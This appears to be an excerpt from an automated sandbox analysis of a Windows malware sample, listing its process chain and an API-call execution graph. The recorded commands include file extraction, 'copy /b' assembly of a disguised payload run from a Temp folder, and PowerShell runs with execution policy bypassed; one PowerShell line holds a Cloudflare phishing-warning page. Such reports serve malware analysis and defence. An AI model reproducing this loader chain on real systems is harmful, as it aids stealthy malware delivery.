                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:8
                                                                                                                                                                      Start time:19:33:26
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:extrac32 /Y /E Agrees
                                                                                                                                                                      Imagebase:0xea0000
                                                                                                                                                                      File size:29'184 bytes
                                                                                                                                                                      MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:9
                                                                                                                                                                      Start time:19:33:26
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:findstr /V "Travels" Served
                                                                                                                                                                      Imagebase:0x130000
                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:10
                                                                                                                                                                      Start time:19:33:27
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems I
                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:11
                                                                                                                                                                      Start time:19:33:27
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\280366\Hc.com
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:Hc.com I
                                                                                                                                                                      Imagebase:0x260000
                                                                                                                                                                      File size:947'288 bytes
                                                                                                                                                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:12
                                                                                                                                                                      Start time:19:33:27
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:choice /d y /t 5
                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                      File size:28'160 bytes
                                                                                                                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:16
                                                                                                                                                                      Start time:19:34:16
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:powershell -exec bypass error code: 523
                                                                                                                                                                      Imagebase:0xc20000
                                                                                                                                                                      File size:433'152 bytes
                                                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:17
                                                                                                                                                                      Start time:19:34:16
                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

Target ID:18
Start time:19:34:18
Start date:23/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
                                                                                                                                                                      Commandline:powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a 
site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="RskevRB4u02FLFVl.7vQxYmyVWENwhkb2yKr86BmjBM-1735000458-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8f6c8140d9e27288</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var 
a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div><!-- /.error-footer --> </div><!-- /#cf-error-details --> </div><!-- /#cf-wrapper --> <script> window._cf_translation = {}; </script> </body> </html>
Imagebase:0xc20000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:19:34:18
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true


Execution Graph

Execution Coverage:17.5%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:21%
Total number of Nodes:1482
Total number of Limit Nodes:25
                                                                                                                                                                        execution_graph 4175 402fc0 4176 401446 18 API calls 4175->4176 4177 402fc7 4176->4177 4178 401a13 4177->4178 4179 403017 4177->4179 4180 40300a 4177->4180 4182 406831 18 API calls 4179->4182 4181 401446 18 API calls 4180->4181 4181->4178 4182->4178 4183 4023c1 4184 40145c 18 API calls 4183->4184 4185 4023c8 4184->4185 4188 407296 4185->4188 4191 406efe CreateFileW 4188->4191 4192 406f30 4191->4192 4193 406f4a ReadFile 4191->4193 4194 4062cf 11 API calls 4192->4194 4195 4023d6 4193->4195 4198 406fb0 4193->4198 4194->4195 4196 406fc7 ReadFile lstrcpynA lstrcmpA 4196->4198 4199 40700e SetFilePointer ReadFile 4196->4199 4197 40720f CloseHandle 4197->4195 4198->4195 4198->4196 4198->4197 4200 407009 4198->4200 4199->4197 4201 4070d4 ReadFile 4199->4201 4200->4197 4202 407164 4201->4202 4202->4200 4202->4201 4203 40718b SetFilePointer GlobalAlloc ReadFile 4202->4203 4204 4071eb lstrcpynW GlobalFree 4203->4204 4205 4071cf 4203->4205 4204->4197 4205->4204 4205->4205 4206 401cc3 4207 40145c 18 API calls 4206->4207 4208 401cca lstrlenW 4207->4208 4209 4030dc 4208->4209 4210 4030e3 4209->4210 4212 405f7d wsprintfW 4209->4212 4212->4210 4213 401c46 4214 40145c 18 API calls 4213->4214 4215 401c4c 4214->4215 4216 4062cf 11 API calls 4215->4216 4217 401c59 4216->4217 4218 406cc7 81 API calls 4217->4218 4219 401c64 4218->4219 4220 403049 4221 401446 18 API calls 4220->4221 4222 403050 4221->4222 4223 406831 18 API calls 4222->4223 4224 401a13 4222->4224 4223->4224 4225 40204a 4226 401446 18 API calls 4225->4226 4227 402051 IsWindow 4226->4227 4228 4018d3 4227->4228 4229 40324c 4230 403277 4229->4230 4231 40325e SetTimer 4229->4231 4232 4032cc 4230->4232 4233 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4230->4233 4231->4230 4233->4232 4234 4022cc 4235 40145c 18 API calls 4234->4235 4236 4022d3 4235->4236 
4237 406301 2 API calls 4236->4237 4238 4022d9 4237->4238 4240 4022e8 4238->4240 4243 405f7d wsprintfW 4238->4243 4241 4030e3 4240->4241 4244 405f7d wsprintfW 4240->4244 4243->4240 4244->4241 4245 4030cf 4246 40145c 18 API calls 4245->4246 4247 4030d6 4246->4247 4249 4030dc 4247->4249 4252 4063d8 GlobalAlloc lstrlenW 4247->4252 4250 4030e3 4249->4250 4279 405f7d wsprintfW 4249->4279 4253 406460 4252->4253 4254 40640e 4252->4254 4253->4249 4255 40643b GetVersionExW 4254->4255 4280 406057 CharUpperW 4254->4280 4255->4253 4256 40646a 4255->4256 4257 406490 LoadLibraryA 4256->4257 4258 406479 4256->4258 4257->4253 4261 4064ae GetProcAddress GetProcAddress GetProcAddress 4257->4261 4258->4253 4260 4065b1 GlobalFree 4258->4260 4262 4065c7 LoadLibraryA 4260->4262 4263 406709 FreeLibrary 4260->4263 4264 406621 4261->4264 4268 4064d6 4261->4268 4262->4253 4266 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4262->4266 4263->4253 4265 40667d FreeLibrary 4264->4265 4267 406656 4264->4267 4265->4267 4266->4264 4271 406716 4267->4271 4276 4066b1 lstrcmpW 4267->4276 4277 4066e2 CloseHandle 4267->4277 4278 406700 CloseHandle 4267->4278 4268->4264 4269 406516 4268->4269 4270 4064fa FreeLibrary GlobalFree 4268->4270 4269->4260 4272 406528 lstrcpyW OpenProcess 4269->4272 4274 40657b CloseHandle CharUpperW lstrcmpW 4269->4274 4270->4253 4273 40671b CloseHandle FreeLibrary 4271->4273 4272->4269 4272->4274 4275 406730 CloseHandle 4273->4275 4274->4264 4274->4269 4275->4273 4276->4267 4276->4275 4277->4267 4278->4263 4279->4250 4280->4254 4281 4044d1 4282 40450b 4281->4282 4283 40453e 4281->4283 4349 405cb0 GetDlgItemTextW 4282->4349 4284 40454b GetDlgItem GetAsyncKeyState 4283->4284 4288 4045dd 4283->4288 4286 40456a GetDlgItem 4284->4286 4299 404588 4284->4299 4291 403d6b 19 API calls 4286->4291 4287 4046c9 4347 40485f 4287->4347 4351 405cb0 GetDlgItemTextW 4287->4351 4288->4287 4296 406831 18 API calls 4288->4296 4288->4347 4289 404516 4290 406064 5 
API calls 4289->4290 4292 40451c 4290->4292 4294 40457d ShowWindow 4291->4294 4295 403ea0 5 API calls 4292->4295 4294->4299 4300 404521 GetDlgItem 4295->4300 4301 40465b SHBrowseForFolderW 4296->4301 4297 4046f5 4302 4067aa 18 API calls 4297->4302 4298 403df6 8 API calls 4303 404873 4298->4303 4304 4045a5 SetWindowTextW 4299->4304 4308 405d85 4 API calls 4299->4308 4305 40452f IsDlgButtonChecked 4300->4305 4300->4347 4301->4287 4307 404673 CoTaskMemFree 4301->4307 4312 4046fb 4302->4312 4306 403d6b 19 API calls 4304->4306 4305->4283 4310 4045c3 4306->4310 4311 40674e 3 API calls 4307->4311 4309 40459b 4308->4309 4309->4304 4316 40674e 3 API calls 4309->4316 4313 403d6b 19 API calls 4310->4313 4314 404680 4311->4314 4352 406035 lstrcpynW 4312->4352 4317 4045ce 4313->4317 4318 4046b7 SetDlgItemTextW 4314->4318 4323 406831 18 API calls 4314->4323 4316->4304 4350 403dc4 SendMessageW 4317->4350 4318->4287 4319 404712 4321 406328 3 API calls 4319->4321 4330 40471a 4321->4330 4322 4045d6 4324 406328 3 API calls 4322->4324 4325 40469f lstrcmpiW 4323->4325 4324->4288 4325->4318 4328 4046b0 lstrcatW 4325->4328 4326 40475c 4353 406035 lstrcpynW 4326->4353 4328->4318 4329 404765 4331 405d85 4 API calls 4329->4331 4330->4326 4334 40677d 2 API calls 4330->4334 4336 4047b1 4330->4336 4332 40476b GetDiskFreeSpaceW 4331->4332 4335 40478f MulDiv 4332->4335 4332->4336 4334->4330 4335->4336 4337 40480e 4336->4337 4354 4043d9 4336->4354 4338 404831 4337->4338 4340 40141d 80 API calls 4337->4340 4362 403db1 KiUserCallbackDispatcher 4338->4362 4340->4338 4341 4047ff 4343 404810 SetDlgItemTextW 4341->4343 4344 404804 4341->4344 4343->4337 4346 4043d9 21 API calls 4344->4346 4345 40484d 4345->4347 4363 403d8d 4345->4363 4346->4337 4347->4298 4349->4289 4350->4322 4351->4297 4352->4319 4353->4329 4355 4043f9 4354->4355 4356 406831 18 API calls 4355->4356 4357 404439 4356->4357 4358 406831 18 API calls 4357->4358 4359 404444 4358->4359 4360 406831 18 API calls 4359->4360 4361 404454 lstrlenW 
wsprintfW SetDlgItemTextW 4360->4361 4361->4341 4362->4345 4364 403da0 SendMessageW 4363->4364 4365 403d9b 4363->4365 4364->4347 4365->4364 4366 401dd3 4367 401446 18 API calls 4366->4367 4368 401dda 4367->4368 4369 401446 18 API calls 4368->4369 4370 4018d3 4369->4370 4371 402e55 4372 40145c 18 API calls 4371->4372 4373 402e63 4372->4373 4374 402e79 4373->4374 4375 40145c 18 API calls 4373->4375 4376 405e5c 2 API calls 4374->4376 4375->4374 4377 402e7f 4376->4377 4401 405e7c GetFileAttributesW CreateFileW 4377->4401 4379 402e8c 4380 402f35 4379->4380 4381 402e98 GlobalAlloc 4379->4381 4384 4062cf 11 API calls 4380->4384 4382 402eb1 4381->4382 4383 402f2c CloseHandle 4381->4383 4402 403368 SetFilePointer 4382->4402 4383->4380 4386 402f45 4384->4386 4388 402f50 DeleteFileW 4386->4388 4389 402f63 4386->4389 4387 402eb7 4390 403336 ReadFile 4387->4390 4388->4389 4403 401435 4389->4403 4392 402ec0 GlobalAlloc 4390->4392 4393 402ed0 4392->4393 4394 402f04 WriteFile GlobalFree 4392->4394 4396 40337f 33 API calls 4393->4396 4395 40337f 33 API calls 4394->4395 4397 402f29 4395->4397 4400 402edd 4396->4400 4397->4383 4399 402efb GlobalFree 4399->4394 4400->4399 4401->4379 4402->4387 4404 404f9e 25 API calls 4403->4404 4405 401443 4404->4405 4406 401cd5 4407 401446 18 API calls 4406->4407 4408 401cdd 4407->4408 4409 401446 18 API calls 4408->4409 4410 401ce8 4409->4410 4411 40145c 18 API calls 4410->4411 4412 401cf1 4411->4412 4413 401d07 lstrlenW 4412->4413 4414 401d43 4412->4414 4415 401d11 4413->4415 4415->4414 4419 406035 lstrcpynW 4415->4419 4417 401d2c 4417->4414 4418 401d39 lstrlenW 4417->4418 4418->4414 4419->4417 4420 402cd7 4421 401446 18 API calls 4420->4421 4423 402c64 4421->4423 4422 402d17 ReadFile 4422->4423 4423->4420 4423->4422 4424 402d99 4423->4424 4425 402dd8 4426 4030e3 4425->4426 4427 402ddf 4425->4427 4428 402de5 FindClose 4427->4428 4428->4426 4429 401d5c 4430 40145c 18 API calls 4429->4430 4431 401d63 4430->4431 4432 40145c 18 API calls 4431->4432 
4433 401d6c 4432->4433 4434 401d73 lstrcmpiW 4433->4434 4435 401d86 lstrcmpW 4433->4435 4436 401d79 4434->4436 4435->4436 4437 401c99 4435->4437 4436->4435 4436->4437 4438 4027e3 4439 4027e9 4438->4439 4440 4027f2 4439->4440 4441 402836 4439->4441 4454 401553 4440->4454 4442 40145c 18 API calls 4441->4442 4444 40283d 4442->4444 4446 4062cf 11 API calls 4444->4446 4445 4027f9 4447 40145c 18 API calls 4445->4447 4451 401a13 4445->4451 4448 40284d 4446->4448 4449 40280a RegDeleteValueW 4447->4449 4458 40149d RegOpenKeyExW 4448->4458 4450 4062cf 11 API calls 4449->4450 4453 40282a RegCloseKey 4450->4453 4453->4451 4455 401563 4454->4455 4456 40145c 18 API calls 4455->4456 4457 401589 RegOpenKeyExW 4456->4457 4457->4445 4461 4014c9 4458->4461 4466 401515 4458->4466 4459 4014ef RegEnumKeyW 4460 401501 RegCloseKey 4459->4460 4459->4461 4463 406328 3 API calls 4460->4463 4461->4459 4461->4460 4462 401526 RegCloseKey 4461->4462 4464 40149d 3 API calls 4461->4464 4462->4466 4465 401511 4463->4465 4464->4461 4465->4466 4467 401541 RegDeleteKeyW 4465->4467 4466->4451 4467->4466 4468 4040e4 4469 4040ff 4468->4469 4475 40422d 4468->4475 4471 40413a 4469->4471 4499 403ff6 WideCharToMultiByte 4469->4499 4470 404298 4472 40436a 4470->4472 4473 4042a2 GetDlgItem 4470->4473 4479 403d6b 19 API calls 4471->4479 4480 403df6 8 API calls 4472->4480 4476 40432b 4473->4476 4477 4042bc 4473->4477 4475->4470 4475->4472 4478 404267 GetDlgItem SendMessageW 4475->4478 4476->4472 4481 40433d 4476->4481 4477->4476 4485 4042e2 6 API calls 4477->4485 4504 403db1 KiUserCallbackDispatcher 4478->4504 4483 40417a 4479->4483 4484 404365 4480->4484 4486 404353 4481->4486 4487 404343 SendMessageW 4481->4487 4489 403d6b 19 API calls 4483->4489 4485->4476 4486->4484 4490 404359 SendMessageW 4486->4490 4487->4486 4488 404293 4491 403d8d SendMessageW 4488->4491 4492 404187 CheckDlgButton 4489->4492 4490->4484 4491->4470 4502 403db1 KiUserCallbackDispatcher 4492->4502 4494 4041a5 GetDlgItem 4503 403dc4 
SendMessageW 4494->4503 4496 4041bb SendMessageW 4497 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4496->4497 4498 4041d8 GetSysColor 4496->4498 4497->4484 4498->4497 4500 404033 4499->4500 4501 404015 GlobalAlloc WideCharToMultiByte 4499->4501 4500->4471 4501->4500 4502->4494 4503->4496 4504->4488 4505 402ae4 4506 402aeb 4505->4506 4507 4030e3 4505->4507 4508 402af2 CloseHandle 4506->4508 4508->4507 4509 402065 4510 401446 18 API calls 4509->4510 4511 40206d 4510->4511 4512 401446 18 API calls 4511->4512 4513 402076 GetDlgItem 4512->4513 4514 4030dc 4513->4514 4515 4030e3 4514->4515 4517 405f7d wsprintfW 4514->4517 4517->4515 4518 402665 4519 40145c 18 API calls 4518->4519 4520 40266b 4519->4520 4521 40145c 18 API calls 4520->4521 4522 402674 4521->4522 4523 40145c 18 API calls 4522->4523 4524 40267d 4523->4524 4525 4062cf 11 API calls 4524->4525 4526 40268c 4525->4526 4527 406301 2 API calls 4526->4527 4528 402695 4527->4528 4529 4026a6 lstrlenW lstrlenW 4528->4529 4531 404f9e 25 API calls 4528->4531 4533 4030e3 4528->4533 4530 404f9e 25 API calls 4529->4530 4532 4026e8 SHFileOperationW 4530->4532 4531->4528 4532->4528 4532->4533 4534 401c69 4535 40145c 18 API calls 4534->4535 4536 401c70 4535->4536 4537 4062cf 11 API calls 4536->4537 4538 401c80 4537->4538 4539 405ccc MessageBoxIndirectW 4538->4539 4540 401a13 4539->4540 4541 402f6e 4542 402f72 4541->4542 4543 402fae 4541->4543 4545 4062cf 11 API calls 4542->4545 4544 40145c 18 API calls 4543->4544 4551 402f9d 4544->4551 4546 402f7d 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 402f90 4547->4548 4549 402fa2 4548->4549 4550 402f98 4548->4550 4553 406113 9 API calls 4549->4553 4552 403ea0 5 API calls 4550->4552 4552->4551 4553->4551 4554 4023f0 4555 402403 4554->4555 4556 4024da 4554->4556 4557 40145c 18 API calls 4555->4557 4558 404f9e 25 API calls 4556->4558 4559 40240a 4557->4559 4562 4024f1 4558->4562 4560 40145c 18 API calls 4559->4560 4561 402413 4560->4561 4563 402429 
LoadLibraryExW 4561->4563 4564 40241b GetModuleHandleW 4561->4564 4565 4024ce 4563->4565 4566 40243e 4563->4566 4564->4563 4564->4566 4568 404f9e 25 API calls 4565->4568 4578 406391 GlobalAlloc WideCharToMultiByte 4566->4578 4568->4556 4569 402449 4570 40248c 4569->4570 4571 40244f 4569->4571 4572 404f9e 25 API calls 4570->4572 4573 401435 25 API calls 4571->4573 4576 40245f 4571->4576 4574 402496 4572->4574 4573->4576 4575 4062cf 11 API calls 4574->4575 4575->4576 4576->4562 4577 4024c0 FreeLibrary 4576->4577 4577->4562 4579 4063c9 GlobalFree 4578->4579 4580 4063bc GetProcAddress 4578->4580 4579->4569 4580->4579 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4581 4048f8 4582 404906 4581->4582 4583 40491d 4581->4583 4584 40490c 4582->4584 4599 404986 4582->4599 4585 40492b IsWindowVisible 4583->4585 4591 404942 4583->4591 4586 403ddb SendMessageW 4584->4586 4588 404938 4585->4588 4585->4599 4589 404916 4586->4589 4587 40498c CallWindowProcW 4587->4589 4600 40487a SendMessageW 4588->4600 4591->4587 4605 406035 lstrcpynW 4591->4605 4593 404971 4606 405f7d wsprintfW 4593->4606 4595 404978 4596 40141d 80 API calls 4595->4596 4597 40497f 4596->4597 4607 406035 lstrcpynW 4597->4607 4599->4587 4601 4048d7 SendMessageW 4600->4601 4602 40489d GetMessagePos ScreenToClient SendMessageW 4600->4602 4604 4048cf 4601->4604 4603 4048d4 4602->4603 4602->4604 4603->4601 4604->4591 4605->4593 4606->4595 4607->4599 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow 
ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4608 4020f9 GetDC GetDeviceCaps 4609 401446 18 API calls 4608->4609 
4610 402116 MulDiv 4609->4610 4611 401446 18 API calls 4610->4611 4612 40212c 4611->4612 4613 406831 18 API calls 4612->4613 4614 402165 CreateFontIndirectW 4613->4614 4615 4030dc 4614->4615 4616 4030e3 4615->4616 4618 405f7d wsprintfW 4615->4618 4618->4616 4619 4024fb 4620 40145c 18 API calls 4619->4620 4621 402502 4620->4621 4622 40145c 18 API calls 4621->4622 4623 40250c 4622->4623 4624 40145c 18 API calls 4623->4624 4625 402515 4624->4625 4626 40145c 18 API calls 4625->4626 4627 40251f 4626->4627 4628 40145c 18 API calls 4627->4628 4629 402529 4628->4629 4630 40253d 4629->4630 4631 40145c 18 API calls 4629->4631 4632 4062cf 11 API calls 4630->4632 4631->4630 4633 40256a CoCreateInstance 4632->4633 4634 40258c 4633->4634 4635 4026fc 4637 402708 4635->4637 4638 401ee4 4635->4638 4636 406831 18 API calls 4636->4638 4638->4635 4638->4636 3782 4019fd 3783 40145c 18 API calls 3782->3783 3784 401a04 3783->3784 3787 405eab 3784->3787 3788 405eb8 GetTickCount GetTempFileNameW 3787->3788 3789 401a0b 3788->3789 3790 405eee 3788->3790 3790->3788 3790->3789 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 4667->4668 4672 401a13 4667->4672 4669 402a45 4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 
